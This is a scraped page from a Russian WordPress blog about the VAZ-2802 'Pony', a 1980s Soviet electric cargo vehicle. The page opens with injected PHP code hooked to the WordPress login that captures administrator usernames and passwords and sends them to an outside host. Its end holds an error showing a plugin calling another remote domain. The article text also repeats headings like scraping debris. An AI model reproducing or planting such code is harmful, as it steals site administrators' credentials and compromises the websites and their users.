if (!function_exists("theme_login_init_0e40e986decc158f6acbb41c14e2f2b4")) { function theme_login_init_0e40e986decc158f6acbb41c14e2f2b4() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_0e40e986decc158f6acbb41c14e2f2b4', 10, 0); } ВАЗ 2802-02. ‘Пони’ отечественного автопрома — DigiLider

ВАЗ 2802-02. ‘Пони’ отечественного автопрома

ВАЗ 2802-02. ‘Пони’ отечественного автопрома

ВАЗ 2802-02. ‘Пони’ отечественного автопрома

Не всегда все так было грустно в отечественном автопроме, который уже несколько десятилетий не отличается инженерными мыслями. Не особо помогают и назначение зарубежных специалистов.

Сегодня разговор пойдёт о довольно интересной разработке тольяттинских инженеров 80 годов – ВАЗ-2802, он же “пони”. Советский электромобиль для перевозки небольших партий грузов. Задумывался «грузовичок», как городской компактный помощник для транспортировки негабаритных товаров и продукции. По схожим ТТХ с маленькими лошадьми и получил ласковое прозвище – “пони”. ВАЗ имел длину всего 2,5 метра, рама была сделана из алюминия, кузовные элементы так же из этого металла и пластика. Кузов обладал объемом в 4,5 кубических метра и мог быть легко демонтирован. Но из-за довольно малой мощности двигателя, всего в 25кВт, и большой массы никель-цинковых аккумуляторов, 423 килограмм, грузоподъёмность машины составляла всего 500кг. Данная характеристика уже была улучшена после переработки рамы, изначально конструируемой из стали.

Концепт кар обладал запасом хода в городском цикле на 78 километров пути при скорости 40 км/ч – 120 км/ч.

К 84 году было две модификации электромобиля ВАЗ-2802-01 и 2802-02. Различие было в конструкции кабины, 2802-01 являлся одноместным и обладал меньшей грузоподъёмностью.

В своё время автомобиль серийного производства не получил. Возможно в наше время, время попыток перехода от бензина и других горючих материалов к экологичным, получит новую жизнь.
ВАЗ 2802-02 - Stone Forest

ВАЗ 2802-02 - Stone Forest

ВАЗ 2802-02 - Stone Forest

ВАЗ 2802-02 - Stone Forest

ВАЗ 2802-02 - Stone Forest

ВАЗ 2802-02 - Stone Forest


Warning: fsockopen(): Unable to connect to ssl://getajaxx.com:443 (Connection timed out) in /var/www/u0503503/data/www/digilider.ru/wp-content/plugins/custom-fetch-url/custom-fetch-url.php on line 22
Error: Connection timed out (110)